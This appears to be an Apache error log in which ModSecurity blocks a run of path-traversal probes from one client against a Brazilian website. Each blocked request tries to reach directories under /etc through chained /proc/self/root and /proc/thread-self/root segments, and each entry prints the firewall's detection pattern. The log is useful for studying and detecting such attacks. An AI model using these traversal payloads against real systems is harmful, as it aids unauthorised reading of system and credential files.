[Tue Mar 17 20:51:05.600972 2026] [:error] [pid 11088:tid 140411716749056] [client 74.7.241.31:45118] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abno6WmqtCojLHvu5cKPXwAAAIM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:51:07.118686 2026] [:error] [pid 25836:tid 140411599251200] [client 74.7.241.31:45124] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abno64h-PF_25v4hFRCQ9wAAARE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:51:08.495908 2026] [:error] [pid 29151:tid 140411574073088] [client 74.7.241.31:43900] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abno7PPqhzTj3BvfDX-vDgAAAdQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:51:21.121944 2026] [proxy_fcgi:error] [pid 31803:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:42650] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:51:23.639187 2026] [:error] [pid 17653:tid 140411725141760] [client 74.7.241.31:39716] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abno-8df6f5d65gmYZRi6AAAAsI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:51:25.346186 2026] [:error] [pid 31803:tid 140411658000128] [client 74.7.241.31:39720] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abno_eyqAr6etmhZHNpNCwAAAEo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:51:29.473254 2026] [:error] [pid 6296:tid 140411557287680] [client 74.7.241.31:39726] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpAXIk7brgkOH-rIWy2QAAAVY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:51:31.304031 2026] [:error] [pid 11088:tid 140411641214720] [client 74.7.241.31:42748] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpA2mqtCojLHvu5cKPYgAAAIw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:51:38.599259 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.241.31:32874] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpCta6ubjKNq_cu4Ys4gAAA0g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:51:40.042067 2026] [:error] [pid 2598:tid 140411741927168] [client 74.7.241.31:32886] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpDBj0p0SRWAqcjGGgMAAAAwA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:51:41.608009 2026] [:error] [pid 11816:tid 140411708356352] [client 74.7.241.31:32888] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpDew_le52K8_3pV1zKAAAAgQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:51:43.069969 2026] [proxy_fcgi:error] [pid 17653:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:43136] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:51:43.154979 2026] [:error] [pid 11088:tid 140411607643904] [client 74.7.241.31:32892] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpD2mqtCojLHvu5cKPZAAAAJA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:51:44.640927 2026] [:error] [pid 31803:tid 140411607643904] [client 74.7.241.31:32900] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpEOyqAr6etmhZHNpNFQAAAFA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:51:46.159689 2026] [:error] [pid 11088:tid 140411733534464] [client 74.7.241.31:32906] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpEmmqtCojLHvu5cKPZQAAAIE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:51:47.617880 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.241.31:35926] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpE9a6ubjKNq_cu4Ys5QAAA0I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:51:50.303255 2026] [:error] [pid 31803:tid 140411574073088] [client 74.7.241.31:35940] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpFuyqAr6etmhZHNpNGAAAAFQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:51:51.999400 2026] [:error] [pid 17653:tid 140411708356352] [client 74.7.241.31:35942] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpF8df6f5d65gmYZRi8wAAAsQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:51:53.457872 2026] [:error] [pid 25836:tid 140411557287680] [client 74.7.241.31:35944] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpGYh-PF_25v4hFRCRCQAAARY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:52:01.683262 2026] [:error] [pid 25836:tid 140411658000128] [client 74.7.241.31:52224] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpIYh-PF_25v4hFRCRDwAAAQo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:52:04.053805 2026] [proxy_fcgi:error] [pid 19507:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:43680] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:52:05.687592 2026] [:error] [pid 11816:tid 140411691570944] [client 74.7.241.31:52238] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpJew_le52K8_3pV1zNAAAAgY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:52:06.977321 2026] [:error] [pid 29151:tid 140411582465792] [client 74.7.241.31:52248] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpJvPqhzTj3BvfDX-vIwAAAdM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:52:08.430049 2026] [:error] [pid 25836:tid 140411599251200] [client 74.7.241.31:52510] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpKIh-PF_25v4hFRCREQAAARE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:52:09.919805 2026] [:error] [pid 25836:tid 140411683178240] [client 74.7.241.31:52514] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnpKYh-PF_25v4hFRCREwAAAQc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:52:09.920424 2026] [mime_magic:error] [pid 25836:tid 140411683178240] (70014)End of file found: [client 74.7.241.31:52514] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
